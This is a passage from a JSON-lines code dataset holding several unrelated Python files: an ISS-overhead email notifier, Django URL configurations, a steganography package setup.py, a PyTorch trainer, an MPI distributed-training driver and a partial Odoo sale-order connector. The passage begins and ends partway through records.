\r\n\r\npygame.quit()\r\n\r\n","repo_name":"Akasame0315/PythonProgram","sub_path":"testPy/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"35957977173","text":"import requests\nfrom datetime import datetime\nimport smtplib\nimport time\n\nMY_LAT = float(input(\"Enter your latitude\")) # latitude\nMY_LONG = float(input(\"Enter your longitude\")) # longitude\n\nmy_email = input(\"Enter your email: \")\npassword = input(\"Enter your email password: \")\n\n\n# True when our position is within +/-5 degrees of the ISS position\ndef is_iss_overhead():\n    # ISS position API\n    iss_response = requests.get(url=\"http://api.open-notify.org/iss-now.json\")\n    iss_response.raise_for_status()\n    iss_data = iss_response.json()\n\n    
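# (Added note) iss-now.json returns JSON shaped roughly like:\n    #   {\"message\": \"success\", \"timestamp\": 1590000000,\n    #    \"iss_position\": {\"latitude\": \"12.34\", \"longitude\": \"56.78\"}}\n    # (coordinates arrive as strings, hence the float() conversions below)\n    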
iss_longitude = float(iss_data[\"iss_position\"][\"longitude\"])\n    iss_latitude = float(iss_data[\"iss_position\"][\"latitude\"])\n\n    if (MY_LAT - 5 < iss_latitude < MY_LAT + 5) and (MY_LONG - 5 < iss_longitude < MY_LONG + 5):\n        return True\n\n\n# check whether it is night\ndef is_night():\n    parameters = {\n        \"lat\": MY_LAT,\n        \"lng\": MY_LONG,\n        \"formatted\": 0,\n    }\n\n    # sunrise/sunset API for our location\n    response = requests.get(url=\"https://api.sunrise-sunset.org/json\", params=parameters)\n    response.raise_for_status()\n    data = response.json() # this data is in UTC; add 5:30 hours for the Indian time zone\n    sunrise = int(data[\"results\"][\"sunrise\"].split(\"T\")[1].split(\":\")[0])\n    sunset = int(data[\"results\"][\"sunset\"].split(\"T\")[1].split(\":\")[0])\n\n    # sunrise and sunset hours in the Indian time zone (5:30 hours ahead of UTC;\n    # note only the 5 whole hours are added here, the extra 30 minutes are dropped)\n    sunrise_indian_time = (sunrise + 5) % 24\n    sunset_indian_time = sunset + 5\n\n    time_now = datetime.now().hour\n\n    if time_now >= sunset_indian_time or time_now <= sunrise_indian_time:\n        return True\n\n\nwhile True:\n    time.sleep(60) # run every 60 seconds\n    # if it is night and the ISS is near us\n    if is_iss_overhead() and is_night():\n        with smtplib.SMTP(\"smtp.gmail.com\") as connection:\n            connection.starttls()\n            connection.login(user=my_email, password=password)\n            connection.sendmail(from_addr=my_email,\n                                to_addrs=my_email,\n                                msg=f\"Subject:Look in the sky👆🙃\\n\\nISS is above you in the sky.\"\n                                )\n","repo_name":"ArunRawat404/API-related-Projects","sub_path":"ISS Overhead Notifier/iss_tracker.py","file_name":"iss_tracker.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"3722991626","text":"import sys\r\n\r\nsys.stdin = open('1959numlists.txt')\r\n\r\n# Given two numbers and two lists whose lengths match those numbers, slide the\r\n# smaller list along the larger one, multiply the aligned values and sum them,\r\n# then return the maximum of those sums.\r\ndef return_result(sm, lg, lst_sm, lst_lg):\r\n    result = []\r\n    for i in range(lg - sm + 1):\r\n        tmp_lst = []\r\n        for j in range(sm):\r\n            tmp_lst.append(lst_lg[i + j] * lst_sm[j])\r\n        result.append(sum(tmp_lst))\r\n    return max(result)\r\n\r\n# t is the number of test cases; n and m are the lengths of the two lists\r\nt = int(input())\r\nfor tc in range(1, t + 1):\r\n    n, m = map(int, input().split())\r\n    lst_n = list(map(int, input().split()))\r\n    lst_m = list(map(int, input().split()))\r\n\r\n    if n <= m:\r\n        print(f'#{tc} {return_result(n, m, lst_n, lst_m)}')\r\n    else:\r\n        print(f'#{tc} {return_result(m, n, lst_m, lst_n)}')\r\n\r\n\r\n\r\n    # lst_a = [list(map(int,input().split())) for _ in range(n)]\r\n","repo_name":"hani2057/algorithm","sub_path":"swea/1006/1959numlists.py","file_name":"1959numlists.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"32165418802","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.index, name='home'),\n path('subscribe', views.subscribe, name='subscribe'),\n path('contacts', views.contacts, name='contacts'),\n path('about', views.about, name='about'),\n path('category', views.category, name='category'),\n path('thank', views.thank, name='thank'),\n\n# path('books', views.books, name='books'),\n# path('e-books', views.e_books, name='e-books'),\n# path('sale', views.sale, name='sale'),\n# path('t-shirts', views.t_shirts, name='t-shirts'),\n\n# path('create', views.create, name='create'),\n]\n","repo_name":"AlexandreMagnesium/bookstore","sub_path":"bookstore/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70778489849","text":"from setuptools import setup, find_packages\n\nVERSION = '0.1.0'\nDESCRIPTION = 'PySteganography - A simple toolset for image encoding and decoding using steganography.'\nLONG_DESCRIPTION = 'A package that provides developers the necessary functions to implement steganography in image files through the least significant bit (LSB) technique.\\nView examples and features on github: https://github.com/deetsadi/pysteganography'\n\nsetup(\n name=\"pysteganography\",\n version=VERSION,\n author=\"deetsadi (Aditya Sridhar)\",\n author_email=\"\",\n description=DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n long_description=LONG_DESCRIPTION,\n package_dir={\"\": \"src\"},\n packages=find_packages(where=\"src\"),\n download_url=\"https://github.com/deetsadi/pysteganography/archive/refs/tags/v_01.tar.gz\",\n install_requires=['opencv-python', 'numpy'],\n keywords=['python', 'steganography', 'cybersecurity', 'images', 'sound', 'security'],\n classifiers=[\n \"Development Status :: 1 - Planning\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n ],\n python_requires=\">=3.6\"\n)\n","repo_name":"deetsadi/pysteganography","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15242491541","text":"\"\"\"\nA trainer class.\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport numpy as np\n\n#from model.gcn import GCNClassifier\nfrom model.gcn_lstm_elmo_cdr import GCNClassifier\nfrom utils import constant, torch_utils\n\nclass Trainer(object):\n def __init__(self, opt,knowledge_emb=None,word_emb=None):\n raise NotImplementedError\n\n def update(self, batch):\n raise NotImplementedError\n\n def predict(self, batch):\n raise NotImplementedError\n\n def update_lr(self, new_lr):\n torch_utils.change_lr(self.optimizer, new_lr)\n\n def load(self, filename):\n try:\n checkpoint = torch.load(filename)\n except BaseException:\n print(\"Cannot load model from {}\".format(filename))\n exit()\n self.model.load_state_dict(checkpoint['model'])\n self.opt = checkpoint['config']\n\n def save(self, filename):\n params = {\n 'model': self.model.state_dict(),\n 'config': self.opt,\n }\n try:\n torch.save(params, filename)\n print(\"model saved to {}\".format(filename))\n except BaseException:\n print(\"[Warning: Saving failed... 
continuing anyway.]\")\n\n\ndef unpack_batch(batch, cuda):\n \"\"\"\n 20\n tokens_elmoid, masks, pos, head,\n subj_mask, obj_mask, dis1, dis2,\n all_two_mesh_index, token_id, subj_positions, obj_positions,\n rels, orig_idx, batch[0], batch[7],\n batch[8], batch[14], batch[15],batch[16]\n \"\"\"\n labels = batch[16]\n if cuda:\n inputs = [b.cuda() for b in batch[:16]]\n labels = labels.cuda()\n else:\n inputs = [b for b in batch[:16]]\n labels = labels\n return inputs, labels\n\nclass GCNTrainer(Trainer):\n def __init__(self, opt,knowledge_emb=None,word_emb=None):\n self.opt = opt\n self.knowledge_emb = knowledge_emb\n self.word_emb=word_emb\n self.model = GCNClassifier(opt,knowledge_emb=knowledge_emb,word_emb=word_emb)\n #print(self.model)\n self.criterion = nn.BCEWithLogitsLoss()\n\n self.parameters = [p for p in self.model.parameters() if p.requires_grad]\n if opt['cuda']:\n self.model.cuda()\n self.criterion.cuda()\n self.optimizer = torch_utils.get_optimizer(opt['optim'], self.parameters, opt['lr'])\n\n def update(self, batch):\n inputs, labels = unpack_batch(batch, self.opt['cuda'])\n # step forward\n self.model.train()\n self.optimizer.zero_grad()\n logits= self.model(inputs)\n #loss = self.criterion(logits, labels )\n loss = self.criterion(logits.squeeze(dim=-1), labels)\n #if loss>10.0:\n #print(loss,logits,labels)\n #print(inputs)\n # l2 decay on all conv layers\n #print(self.opt.get('conv_l2', 0) )\n '''\n if self.opt.get('conv_l2', 0) > 0:\n loss += self.model.conv_l2() * self.opt['conv_l2']\n '''\n loss_val = loss.item()\n # backward\n loss.backward()\n #torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.opt['max_grad_norm'])\n self.optimizer.step()\n return loss_val\n\n def predict(self, batch,unsort=True):\n inputs, labels= unpack_batch(batch, self.opt['cuda'])\n #orig_idx = batch[8]\n # forward\n self.model.eval()\n\n logits = self.model(inputs)\n\n loss = self.criterion(logits.squeeze(dim=-1), labels)\n #print(loss.item())\n #probs = F.softmax(logits, 1).data.cpu().numpy().tolist()\n probs = torch.sigmoid(logits).data.cpu().numpy().tolist()\n predictions = np.argmax(logits.data.cpu().numpy(), axis=1).tolist()\n '''\n if unsort:\n _, predictions, probs = [list(t) for t in zip(*sorted(zip(orig_idx,\\\n predictions, probs)))]\n '''\n return predictions, probs, loss.item()\n","repo_name":"sunyi123/cdr","sub_path":"model/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"36592892492","text":"#!/usr/bin/env python3\n\n### This script creates an MPIManager object and launches distributed training.\n\nimport sys,os\nimport numpy as np\nimport argparse\nimport json\nimport re\nimport logging\nimport glob\n\nfrom mpi4py import MPI\nfrom time import time,sleep\n\nfrom nnlo.mpi.manager import MPIManager, get_device\nfrom nnlo.train.algo import Algo\nfrom nnlo.train.data import H5Data\nfrom nnlo.train.model import ModelFromJson, ModelTensorFlow, ModelPytorch\nfrom nnlo.util.utils import import_keras\nfrom nnlo.util.timeline import Timeline\nfrom nnlo.util.logger import initialize_logger\n\ndef make_Block_Parser():\n pass\ndef add_log_option(parser):\n # logging configuration\n parser.add_argument('--log-file', default=None, dest='log_file', help='log file to write, in additon to output stream')\n parser.add_argument('--log-level', default='info', dest='log_level', help='log level (debug, info, warn, error)')\n\ndef 
add_master_option(parser):\n parser.add_argument('--master-gpu',help='master process should get a gpu',\n action='store_true', dest='master_gpu')\n parser.add_argument('--synchronous',help='run in synchronous mode',action='store_true')\n \ndef add_worker_options(parser):\n parser.add_argument('--worker-optimizer',help='optimizer for workers to use',\n dest='worker_optimizer', default='adam')\n parser.add_argument('--worker-optimizer-params',help='worker optimizer parameters (string representation of a dict)',\n dest='worker_optimizer_params', default='{}')\n \n \ndef add_gem_options(parser):\n parser.add_argument('--gem-lr',help='learning rate for GEM',type=float,default=0.01, dest='gem_lr')\n parser.add_argument('--gem-momentum',help='momentum for GEM',type=float, default=0.9, dest='gem_momentum')\n parser.add_argument('--gem-kappa',help='Proxy amplification parameter for GEM',type=float, default=2.0, dest='gem_kappa') \n\ndef add_easgd_options(parser):\n parser.add_argument('--elastic-force',help='beta parameter for EASGD',type=float,default=0.9)\n parser.add_argument('--elastic-lr',help='worker SGD learning rate for EASGD',\n type=float, default=1.0, dest='elastic_lr')\n parser.add_argument('--elastic-momentum',help='worker SGD momentum for EASGD',\n type=float, default=0, dest='elastic_momentum')\n\ndef add_downpour_options(parser):\n parser.add_argument('--optimizer',help='optimizer for master to use in downpour',default='adam')\n\n\ndef add_loader_options(parser):\n parser.add_argument('--preload-data', help='Preload files as we read them', default=0, type=int, dest='data_preload')\n parser.add_argument('--cache-data', help='Cache the input files to a provided directory', default='', dest='caching_dir')\n parser.add_argument('--copy-command', help='Specific command line to copy the data into the cache. Expect a string with two {} first is the source (from input file list), second is the bare file name at destination. Like \"cp {} {}\"', default=None, dest='copy_command')\n\n\ndef add_target_options(parser):\n parser.add_argument('--early-stopping', default=None,\n dest='early_stopping', help='patience for early stopping')\n parser.add_argument('--target-metric', default=None,\n dest='target_metric', help='Passing configuration for a target metric')\n \n\ndef make_train_parser():\n parser = argparse.ArgumentParser() \n parser.add_argument('--timeline',help='Record timeline of activity', action='store_true')\n add_train_options(parser)\n\n return parser\n\ndef add_checkpoint_options(parser):\n parser.add_argument('--restore', help='pass a file to retore the variables from', default=None)\n parser.add_argument('--checkpoint', help='Base name of the checkpointing file. 
If omitted no checkpointing will be done', default=None)\n    parser.add_argument('--checkpoint-interval', help='Number of epochs between checkpoints', default=5, type=int, dest='checkpoint_interval')\n    \ndef add_train_options(parser):\n    parser.add_argument('--verbose',help='display metrics for each training batch',action='store_true')\n    parser.add_argument('--monitor',help='Monitor cpu and gpu utilization', action='store_true')\n\n    parser.add_argument('--backend', help='specify the backend to be used', choices= ['keras','torch'],default='keras')\n    parser.add_argument('--thread_validation', help='run a single process', action='store_true')\n    \n    # model arguments\n    parser.add_argument('--model', help='File containing model architecture (serialized in JSON/pickle, or provided in a .py file)')\n    parser.add_argument('--trial-name', help='descriptive name for trial', \n            default='train', dest='trial_name')\n\n    # training data arguments\n    parser.add_argument('--train_data', help='text file listing data inputs for training', default=None)\n    parser.add_argument('--val_data', help='text file listing data inputs for validation', default=None)\n    parser.add_argument('--features-name', help='name of HDF5 dataset with input features',\n            default='features', dest='features_name')\n    parser.add_argument('--labels-name', help='name of HDF5 dataset with output labels',\n            default='labels', dest='labels_name')\n    \n    parser.add_argument('--batch', help='batch size', default=100, type=int)\n\n    \n\n    # configuration of network topology\n    parser.add_argument('--n-masters', dest='n_masters', help='number of master processes', default=1, type=int)\n    parser.add_argument('--n-processes', dest='n_processes', help='number of processes per worker', default=1, type=int)\n    parser.add_argument('--max-gpus', dest='max_gpus', help='max GPUs to use', type=int, default=1)\n\n\n    # configuration of training process\n    parser.add_argument('--epochs', help='number of training epochs', default=1, type=int)\n\n    parser.add_argument('--loss',help='loss function',default='binary_crossentropy')\n\n    add_target_options(parser)\n\n    add_worker_options(parser)\n\n    parser.add_argument('--sync-every', help='how often to sync weights with master', \n            default=1, type=int, dest='sync_every')\n    parser.add_argument('--mode',help='Mode of operation.'\n                        'One of \"downpour\" (Downpour), \"easgd\" (Elastic Averaging SGD) or \"gem\" (Gradient Energy Matching)',default='gem',choices=['downpour','easgd','gem'])\n\n    add_master_option(parser)\n    add_gem_options(parser)\n    add_easgd_options(parser)\n    add_downpour_options(parser)\n    \n    add_loader_options(parser)\n    \n    add_log_option(parser)\n    add_checkpoint_options(parser)\n\ndef make_loader( args, features_name, labels_name, train_list):\n    data = H5Data( batch_size=args.batch,\n                   cache = args.caching_dir,\n                   copy_command = args.copy_command, \n                   preloading = args.data_preload,\n                   features_name=features_name,\n                   labels_name=labels_name,\n                   )\n    # We initialize the Data object with the training data list\n    # so that we can use it to count the number of training examples\n    data.set_full_file_names( train_list )\n    \n    return data\n\ndef make_model_weight(args, use_torch):\n    model_weights = None\n    if args.restore:\n        args.restore = re.sub(r'\\.algo$', '', args.restore)\n        if os.path.isfile(args.restore + '.latest'):\n            with open(args.restore + '.latest', 'r') as latest:\n                args.restore = latest.read().splitlines()[-1]\n        if any([os.path.isfile(ff) for ff in glob.glob('./*'+args.restore + '.model')]):\n            if use_torch:\n                args.model = 
args.restore + '.model'\n model_weights = args.restore +'.model_w'\n else:\n model_weights = args.restore + '.model'\n \n return model_weights\n \ndef make_algo( args, use_tf, comm, validate_every ):\n args_opt = args.optimizer\n if use_tf:\n if not args_opt.endswith(\"tf\"):\n args_opt = args_opt + 'tf'\n else:\n if not args_opt.endswith(\"torch\"):\n args_opt = args_opt + 'torch'\n \n if args.mode == 'easgd':\n algo = Algo(None, loss=args.loss, validate_every=validate_every,\n mode='easgd', sync_every=args.sync_every,\n worker_optimizer=args.worker_optimizer,\n worker_optimizer_params=args.worker_optimizer_params,\n elastic_force=args.elastic_force/(max(1,comm.Get_size()-1)),\n elastic_lr=args.elastic_lr, \n elastic_momentum=args.elastic_momentum) \n elif args.mode == 'gem':\n algo = Algo('gem', loss=args.loss, validate_every=validate_every,\n mode='gem', sync_every=args.sync_every,\n worker_optimizer=args.worker_optimizer,\n worker_optimizer_params=args.worker_optimizer_params,\n learning_rate=args.gem_lr, momentum=args.gem_momentum, kappa=args.gem_kappa)\n elif args.mode == 'downpour':\n algo = Algo(args_opt, loss=args.loss, validate_every=validate_every,\n sync_every=args.sync_every, worker_optimizer=args.worker_optimizer,\n worker_optimizer_params=args.worker_optimizer_params)\n else:\n logging.info(\"%s not supported mode\", args.mode)\n return algo\n\ndef make_train_val_lists(m_module, args):\n train_list = val_list = []\n if args.train_data:\n with open(args.train_data) as train_list_file:\n train_list = [ s.strip() for s in train_list_file.readlines() ]\n elif m_module is not None:\n train_list = m_module.get_train()\n else:\n logging.info(\"no training data provided\")\n \n if args.val_data:\n with open(args.val_data) as val_list_file:\n val_list = [ s.strip() for s in val_list_file.readlines() ]\n elif m_module is not None:\n val_list = m_module.get_val()\n else:\n logging.info(\"no validation data provided\")\n\n if not train_list:\n logging.error(\"No training data provided\")\n if not val_list:\n logging.error(\"No validation data provided\")\n return (train_list, val_list) \n\ndef make_features_labels(m_module, args):\n features_name = m_module.get_features() if m_module is not None and hasattr(m_module,\"get_features\") else args.features_name\n labels_name = m_module.get_labels() if m_module is not None and hasattr(m_module,\"get_labels\") else args.labels_name\n return (features_name, labels_name)\n\nif __name__ == '__main__':\n parser = make_train_parser()\n args = parser.parse_args() \n initialize_logger(filename=args.log_file, file_level=args.log_level, stream_level=args.log_level)\n\n a_backend = args.backend\n if 'torch' in args.model:\n a_backend = 'torch'\n \n m_module = __import__(args.model.replace('.py','').replace('/', '.'), fromlist=[None]) if '.py' in args.model else None\n (features_name, labels_name) = make_features_labels(m_module, args)\n (train_list, val_list) = make_train_val_lists(m_module, args)\n comm = MPI.COMM_WORLD.Dup()\n\n if args.timeline: Timeline.enable()\n\n use_tf = a_backend == 'keras'\n use_torch = not use_tf\n\n model_weights = make_model_weight(args, use_torch)\n\n # Theano is the default backend; use tensorflow if --tf is specified.\n # In the theano case it is necessary to specify the device before importing.\n device = get_device( comm, args.n_masters, gpu_limit=args.max_gpus,\n gpu_for_master=args.master_gpu)\n os.environ['CUDA_VISIBLE_DEVICES'] = device[-1] if 'gpu' in device else ''\n logging.debug('set to device 
%s',os.environ['CUDA_VISIBLE_DEVICES'])\n\n    if use_torch:\n        logging.debug(\"Using pytorch\")\n        model_builder = ModelPytorch(comm, source=args.model, weights=model_weights, gpus=1 if 'gpu' in device else 0)\n    else:\n        logging.debug(\"Using TensorFlow\")\n        os.environ['KERAS_BACKEND'] = 'tensorflow'\n\n        import_keras()\n        import keras.backend as K\n        gpu_options=K.tf.GPUOptions(\n            per_process_gpu_memory_fraction=0.1, #was 0.0\n            allow_growth = True,\n            visible_device_list = device[-1] if 'gpu' in device else '')\n        # NOTE: the assignment below overrides the GPUOptions built above,\n        # so the per-device visible_device_list is effectively unused\n        gpu_options=K.tf.GPUOptions(\n            per_process_gpu_memory_fraction=0.0,\n            allow_growth = True,) \n        #NTHREADS=(2,1)\n        NTHREADS=None\n        if NTHREADS is None:\n            K.set_session( K.tf.Session( config=K.tf.ConfigProto(\n                allow_soft_placement=True, log_device_placement=False,\n                gpu_options=gpu_options\n            ) ) )\n        else:\n            K.set_session( K.tf.Session( config=K.tf.ConfigProto(\n                allow_soft_placement=True, log_device_placement=False,\n                gpu_options=gpu_options,\n                intra_op_parallelism_threads=NTHREADS[0], \n                inter_op_parallelism_threads=NTHREADS[1],\n            ) ) )\n        \n\n        model_builder = ModelTensorFlow( comm, source=args.model, weights=model_weights)\n\n\n    data = make_loader(args, features_name, labels_name, train_list)\n\n    # Some input arguments may be ignored depending on chosen algorithm\n    algo = make_algo( args, use_tf, comm, validate_every=int(data.count_data()/args.batch ))\n    \n    if args.restore:\n        algo.load(args.restore)\n\n    # Creating the MPIManager object causes all needed worker and master nodes to be created\n    manager = MPIManager( comm=comm, data=data, algo=algo, model_builder=model_builder,\n                          num_epochs=args.epochs, train_list=train_list, val_list=val_list, \n                          num_masters=args.n_masters, num_processes=args.n_processes,\n                          synchronous=args.synchronous, \n                          verbose=args.verbose, monitor=args.monitor,\n                          early_stopping=args.early_stopping,\n                          target_metric=args.target_metric,\n                          thread_validation = args.thread_validation,\n                          checkpoint=args.checkpoint, checkpoint_interval=args.checkpoint_interval)\n\n\n    if m_module:\n        model_name =m_module.get_name()\n    else:\n        model_name = os.path.basename(args.model).replace('.json','')\n\n    json_name = '_'.join([model_name,args.trial_name,\"history.json\"])\n    tl_json_name = '_'.join([model_name,args.trial_name,\"timeline.json\"])\n\n    # Process 0 launches the training procedure\n    if comm.Get_rank() == 0:\n        logging.debug('Training configuration: %s', algo.get_config())\n\n    t_0 = time()\n    histories = manager.process.train() \n    delta_t = time() - t_0\n    logging.info(\"Training finished in {0:.3f} seconds\".format(delta_t))\n\n    manager.process.record_details(json_name,\n                                   meta={\"args\":vars(args)}) \n    logging.info(\"Wrote trial information to {0}\".format(json_name))\n    manager.close()\n\n    comm.barrier()\n    logging.info(\"Terminating\")\n    if args.timeline: Timeline.collect(clean=True, file_name=tl_json_name)\n","repo_name":"vlimant/NNLO","sub_path":"TrainingDriver.py","file_name":"TrainingDriver.py","file_ext":"py","file_size_in_byte":15051,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"}
{"seq_id":"75016774007","text":"from django.urls import path\n\nfrom .views import *\n\nurlpatterns = [\n    path('login/', UserLoginView.as_view(), name='user_login'),\n    path('logout/', UserLogoutView.as_view(), name='user_logout'),\n    path('register', UserRegistrationView.as_view(), name='user_register'),\n    path('edit_profile/', UserEditView.as_view(), name='edit_profile'),\n    path('password/', PasswordsChangeView.as_view(), name='password'),\n    
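# NOTE: the <int:pk> converters below are an assumption; the original converter\n    # names were lost in extraction (routes appeared as 'edit_note//'). With\n    # <int:pk>, e.g. GET /edit_note/42/ resolves to EditNoteView with pk=42.\n    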
path('create_note/', CreateNoteView.as_view(), name='create_note'),\n    path('edit_note/<int:pk>/', EditNoteView.as_view(), name='edit_note'),\n    path('delete_note/<int:pk>/', delete_note, name=\"delete_note\"),\n    path('detail_note/<int:pk>/', DetailNoteView.as_view(), name='detail_note'),\n    path('my_notes/', MyNotesView.as_view(), name='my_notes'),\n    path('set_like/<int:pk>/', like_post, name='set_like'),\n    path('set_dislike/<int:pk>/', dislike_post, name='set_dislike'),\n    path('draft/', DraftNotesView.as_view(), name='draft_notes'),\n    path('subscriptions/', SubscriptionsView.as_view(), name='subscriptions'),\n    path('unfollow_user/<int:pk>/', unfollow_user, name='unfollow_user'),\n    path('subscribers/', SubscribersView.as_view(), name='subscribers'),\n    path('unsubscribe_from_user/<int:pk>/', unsubscribe_from_user, name='unsubscribe_from_user'),\n    path('all_users/', AllUsersView.as_view(), name='all_users'),\n    path('speaker/<int:pk>/', SpeakerNotesView.as_view(), name='speaker'),\n    path('subscribe_to_user/<int:pk>/', subscribe_to_user, name='subscribe_to_user')\n]\n","repo_name":"AgentRediska/BlogDjango","sub_path":"blog/board/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"27547770226","text":"import json\nimport logging\n\nfrom odoo import models, fields, api\nfrom odoo.exceptions import UserError, ValidationError\nfrom ..tools import DateTimeToOdoo, CleanDataDict\n\n_logger = logging.getLogger(__name__)\n\n\n\nclass sale_order(models.Model):\n    _name = 'sale.order'\n    _inherit = [\"custom.connector.spt\",\"sale.order\"]\n    _TTRxKey = 'uuid'\n    _OdooToTTRx = {'uuid':'uuid'}\n    _TTRxToOdoo = {'uuid':'uuid'}\n    \n    uuid = fields.Char(\"UUID\", copy=False)\n    source_location = fields.Many2one('stock.location', string=\"Source Location\") #TODO: verify\n    send_to_ttr2 = fields.Boolean('Send to TTRx', default=False)\n    \n    def FromOdooToTTRx(self, values={}):\n        var = super().FromOdooToTTRx(values=values)\n\n        #TODO: handle the case where the partner does not come from TTRx\n        if not bool(self.partner_id.uuid):\n            partner_uuid = self.partner_id.CreateInTTRx()\n        else:\n            partner_uuid = self.partner_id.uuid\n\n        item_lines = []\n        for line in self.order_line:\n            if bool(line.product_id.product_spt_id):\n                vals = {\n                    \"product_uuid\": line.product_id.product_spt_id.uuid, \n                    \"quantity\": int(line.product_uom_qty), \n                    \"sort_order\": line.id,\n                }\n                item_lines.append(vals)\n            else:\n                #TODO: handle the case where the product does not exist in TTRx\n                raise UserError(\"Product \" + line.product_id.name + \" does not exist in TTR system.\")\n\n        if not self.source_location.location_spt_id.uuid:\n            #TODO: handle the case where the default location does not exist in TTRx\n            raise UserError(\"Location \" + self.source_location.name + \" does not exist in TTR system.\")\n        else:\n            location_uuid = self.source_location.location_spt_id.uuid\n\n        var.update({\n            \"transaction_type\": \"sales\",\n            \"location_uuid\": location_uuid,\n            \"trading_partner_uuid\": partner_uuid,\n            \"transaction_date\": str(self.date_order.date()),\n            \"po_nbr\": str(self.name),\n            \"line_items\": json.dumps(item_lines),\n            \"sold_by_address_custom_recipient_name\": self.company_id.name,\n            \"sold_by_address_custom_line1\": self.company_id.street or None,\n            \"sold_by_address_custom_line2\": self.company_id.street2 or None,\n            \"sold_by_address_custom_country_code\": self.company_id.country_id.code or None,\n            \"sold_by_address_custom_country_name\": self.company_id.country_id.name or None,\n            
\"sold_by_address_custom_city\": self.company_id.city or None,\n \"sold_by_address_custom_zip\": self.company_id.zip or None,\n \"sold_by_address_custom_phone\": self.company_id.phone or None,\n \"sold_by_address_custom_email\": self.company_id.email or None,\n \"ship_from_address_custom_recipient_name\": self.company_id.name,\n \"ship_from_address_custom_line1\": self.company_id.street or None,\n \"ship_from_address_custom_line2\": self.company_id.street2 or None,\n \"ship_from_address_custom_country_code\": self.company_id.country_id.code or None,\n \"ship_from_address_custom_country_name\": self.company_id.country_id.name or None,\n \"ship_from_address_custom_city\": self.company_id.city or None,\n \"ship_from_address_custom_zip\": self.company_id.zip or None,\n \"ship_from_address_custom_phone\": self.company_id.phone or None,\n \"ship_from_address_custom_email\": self.company_id.email or None,\n \"billing_address_custom_recipient_name\": self.partner_id.name,\n \"billing_address_custom_line1\": self.partner_id.street or None,\n \"billing_address_custom_line2\": self.partner_id.street2 or None,\n \"billing_address_custom_country_code\": self.partner_id.country_id.code or None,\n \"billing_address_custom_country_name\": self.partner_id.country_id.name or None,\n \"billing_address_custom_city\": self.partner_id.city or None,\n \"billing_address_custom_zip\": self.partner_id.zip or None,\n \"billing_address_custom_phone\": self.partner_id.phone or None,\n \"billing_address_custom_email\": self.partner_id.email or None,\n \"ship_to_address_custom_recipient_name\": self.partner_id.name,\n \"ship_to_address_custom_line1\": self.partner_id.street or None,\n \"ship_to_address_custom_line2\": self.partner_id.street2 or None,\n \"ship_to_address_custom_country_code\": self.partner_id.country_id.code or None,\n \"ship_to_address_custom_country_name\": self.partner_id.country_id.name or None,\n \"ship_to_address_custom_city\": self.partner_id.city or None,\n \"ship_to_address_custom_zip\": self.partner_id.zip or None,\n \"ship_to_address_custom_phone\": self.partner_id.phone or None,\n \"ship_to_address_custom_email\": self.partner_id.email or None,\n \"is_approved\": True,\n # \"is_approved_is_ship_transaction\": True,\n })\n CleanDataDict(var)\n return var\n \n def FromTTRxToOdoo(self, values):\n var = super().FromTTRxToOdoo(values=values)\n order_lines = self.FromLinesTTRxToOdoo(values['line_items'])\n new_order_lines = []\n if self.search_count([('uuid','=',values['uuid'])]) > 0:\n for line in order_lines:\n nid = line.pop('id')\n new_order_lines += [(1,nid,line)]\n else:\n new_order_lines += [(5,)]\n for line in order_lines:\n line.pop('id')\n new_order_lines += [(0,0,line)]\n\n var.update({\n 'order_line': new_order_lines,\n })\n CleanDataDict(var)\n return var\n\n def FromLinesTTRxToOdoo(self, ttr_lines):\n order_line = []\n for ttr_line in ttr_lines:\n product_uuid = ttr_line['product']['uuid']\n product_id = self.env['product.spt'].search([('uuid','=',product_uuid)],limit=1).product_id\n var = {\n 'uuid': ttr_line.get('uuid'),\n 'product_id': product_id.id,\n 'product_uom': product_id.uom_id.id,\n 'name': product_id.name,\n 'product_uom_qty': ttr_line.get('quantity'),\n 'id': int(ttr_line['sort_order']) if bool(ttr_line.get('sort_order')) else None,\n }\n CleanDataDict(var)\n order_line.append(var)\n return order_line\n \n \n\n\n def CreateInTTRx(self, **params):\n resource = \"%s\" % self._name\n params['data'] = self.FromOdooToTTRx()\n if bool(self.BeforeCreateInOdoo(**params)):\n 
